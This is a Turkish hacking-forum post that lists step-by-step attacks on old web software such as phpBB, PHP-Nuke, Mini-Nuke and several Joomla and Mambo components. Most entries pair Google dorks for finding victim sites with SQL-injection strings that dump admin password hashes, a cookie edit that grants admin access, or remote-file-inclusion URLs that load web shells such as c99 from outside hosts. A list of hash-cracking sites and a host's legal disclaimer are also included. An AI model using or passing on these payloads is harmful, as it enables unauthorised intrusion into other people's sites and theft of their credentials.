Hangi Site Nasıl Hacklenir?

BiRkan2

Uzman üye
1 Tem 2007
1,670
49
119
Prison Break
Hangi site nasil hacklenir....

--------------------------------------------------------------------------------
-MİNİ NUKE V2.3

Mini nuke sitelerle uğraşmak için ilk önce

wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.

Karşımıza gelen sitelerin sonuna

:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1

Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.

MD5 i kırmak içinde

http://passcrack.spb.ru/
http://gdataonline.com/
color=#0000ffhttp://us.md5.crysm.net
color=#0000ffhttp://md5.rednoize.com
http://ice.breaker.free.fr/
http://www.milw0rm.com/md5/
color=#0000ffhttp://shm.hard-core.pl/md5/
color=#0000ffhttp://www.hashchecker.com
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
color=#0000ffhttp://md5.benramsey.com
color=#0000ffhttp://md5.altervista.org
color=#0000ffhttp://shm.hard-core.pl
http://plain-text.info/
color=#0000ffhttp://www.md5lookup.com
color=#0000ffhttp://www.passcracking.ru
color=#0000ffhttp://www.md5lookup.com
color=#0000ffhttp://www.passcracking.ru/
color=#0000ffhttp://www.securitystats.com/tools/hashcrack.php

---------------------------------------------------------------------------

-VİRTUAL WAR V.1.0

ilk önce http://www.google.com/ ’Powered by: Virtual War v1.5.0’

Sonu /war.php olan siteleri seçiyoruz ve

war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.

Artık admin palenelindeyiz

[Eski bir açık olduğu için sonuç alamayabilirsiniz]


---------------------------------------------------------------------------
---
-PHPBB 2.0.11

işte meşhur phpbb açığı

Bize gereken en önemli program :


Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.

Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından

kurban phpbb 2.0.11 sitemizi seçicez.

Sitemizi bulduk 2 kez tıklıyoruz.

Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik

Kubidik Kodlar Gelicek Üssteki Kodu Slip

a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz

Saveliyoruz.

Artık cooike editör ile işimiz bitti

Sitemizi yeniliyoruz bakıyoruz aaaa adminiz

---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON

http://www.google.com/ a giriyoruz aranacak kelimeye

’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.

Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi

Search bölümünü bulamadıysanız


Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.


---------------------------------------------------------------------------
------
-COM_REMOSİTORY

http://www.google.com/ ’’inurl:"com_remository"

Bulduğumuz sitelere

http://%5bsitepath%5d/%5bjoomlapat....php?mosConfighttp://[sitepath]/[joomlapat....php?mosConfig[/URL] _absolute_path=http://site/phpshell.php

Kodunu ekliyoruz...

---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT

http://www.google.com/ ’inurl:modules/myAds/’

Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.

color=#0000ffhttp://www.site.com/modules/myAds/an...rs+limit+1*1/*

Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...

---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB

GoogLe Arama : inurl:"toplist.php" "powered by phpbb"


Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls

--------------
- PC_COOKBOOK JOOMLA COMPONENT

- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities

- Author: JaheeMCreW

- Uygulama : pc_cookbook Component

- Version : koyans 0.3

Yapmaniz gereken bir arama moturunda örnek google’ da

" allinurl:com_pccookbook " olarak aratmaktir..

Exploit :

http://%5btarget%5d/%5bpath%5d/compo...osConfig_absolhttp://[target]/[path]/compo...osConfig_absol[/URL] ute_path=http://evilscript

---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO

İlk Önce WwwW.GoogLe.com

Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...

color=#0000ffhttp://site.com/components/com_simpl...me%20-a;id;pwd

---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion

shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...

Code:

/shoutbox/expanded.php?conf=


GoogLe Arama : inurl:"/shoutbox/expanded.php?"

---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION

Google Search=inurl:classified.php phpbazar

color=#0000ffhttp://hedefsite.com/classified_righ...ell.txt?cmd=id

---------------
-BoastMachine [bmachine]

yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :

site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin

şifresini görüyoruz : )

---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion

GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"


Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls


-CaLogic Calendars V1.2.2 - Remote File Include

GoogLe Arama : CaLogic Calendars V1.2.2

kullanmak için :



---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]

PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..


color=#0000ffhttp://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://%5battacker%5d/http://[attacker]/[/URL]​

---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]

Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..

Uretici Firma : color=#0000ffhttp://jetbox.streamedge.com/

JetBox CMS Remote File Include

http://%5bdomain%5d/http://[domain]/[/URL] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..

GoogLe arama : Powered by Jetbox

---------------------------------------------------------------------------
---------------------


Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
 

aeonas

Üye
1 Eki 2007
86
3
selaymun aleyküm orgeneral siz bunlarla neden uğrasıyorsunuz hack yapmak için 2 tane program gibi bisey varmıs onu yazında rep verelim bunu yapabilecek yapsın onu bunu yaz olarak olmaz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.